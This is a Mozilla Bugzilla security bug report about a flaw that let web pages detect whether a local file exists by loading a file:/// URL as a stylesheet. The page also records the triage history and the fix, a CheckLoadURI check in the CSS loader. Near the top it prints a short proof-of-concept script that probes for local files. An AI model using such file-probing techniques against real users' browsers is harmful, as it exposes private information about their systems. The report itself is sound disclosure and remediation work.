Closed Bug 16858 Opened 25 years ago Closed 24 years ago

Shouldn't be able to check for local file existence

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Platform:
x86
Windows 95
Type:
defect

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: joro, Assigned: security-bugs)

References

(
URL
)

Details

(Whiteboard: [nsbeta2+])

Attachments

(2 files)

A simpler testcase...use this instead of the above.
(deleted), text/html
Details
Proposed Patch - Needs Review
(deleted), patch
Details | Diff | Splinter Review 
It is possible to check for local file existence in Mozilla 5.0.

The problem is LINK REL=STYLESHEET TYPE="text/css" HREF="file:///C|/test.html"
returns "null" in document.styleSheets[0] if the file does not exist, otherwise
it returns an object.

The code is:
-------------------------------------------------------
<SCRIPT>
function f()
{
a.document.open();
s="<HTML><HEAD><LINK REL=STYLESHEET TYPE='text/css' HREF='"+
document.forms[0].elements[0].value+"'></HEAD><SCRIPT>function exist() "+
"{alert( document.styleSheets[0] ? 'File exists' : 'File does not exist ');};"+
"setTimeout('exist()',2000);</"+"SCRIPT></HTML>";
a.document.write(s);
a.document.close();
}
function main()
{
a=window.open("about:blank");
setTimeout("f()",2000);
}
</SCRIPT>
Status: NEW → ASSIGNED
Target Milestone: M14
Target Milestone: M14 → M15
Not required for beta.
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General
Keywords: beta2
We shouldn't require PSM if people want to use codebase principals.
Assignee: norris → mstoltz
Status: ASSIGNED → NEW
Disregard my last comments and reassign back to me. I applied the changes to the
wrong bug.
Assignee: mstoltz → norris
Status: NEW → ASSIGNED
Target Milestone: M15 → M16
Changing Qa contact to myself.
QA Contact: dshea → junruh
Keywords: nsbeta2
Bulk reassigning most of norris's bugs to mstoltz.
Assignee: norris → mstoltz
Status: ASSIGNED → NEW
Putting on [nsbeta2+] radar for beta2 fix.
Summary: Checking for local file existence → Shouldn't be able to check for local file existence
Whiteboard: [nsbeta2+]
Changed QA contact to Cathy.
QA Contact: junruh → czhang
the bug is still there
The CSS code needs to call nsScriptSecurityManager::CheckLoadURI() at every
entry point for a URL coming from a <STYLE HREF=> or other varieties of STYLE
tag. I need help in finding where these points are. Pierre, can we talk about
this? Or is there someone else I should ask?

What I need to know is a) where to check the URL, and b) how to exit gracefully
if the check fails.
Status: NEW → ASSIGNED
The place to put such a check is CSSLoaderImpl::LoadStyleLink().

If the check fails, returning NS_ERROR_FAILURE should be sufficient.


Pierre,
   I've got a patch which fixes this bug, could you please review it? I'll
attach it here. Also, are there any other functions in nsCSSLoader.cpp that
should be protected? I noticed LoadChildSheet() and LoadAgentSheet() both take a
URL parameter - do any of these come from URL's in the HTML?
Fix checked in. Added URL security check to STYLE tags. Can be turned off with
the security.checkloaduri pref.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
document.styleSheets[] is returning NULL no matter local file exists or not, so 
no security problem here, it is fixed.
Status: RESOLVED → VERIFIED
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: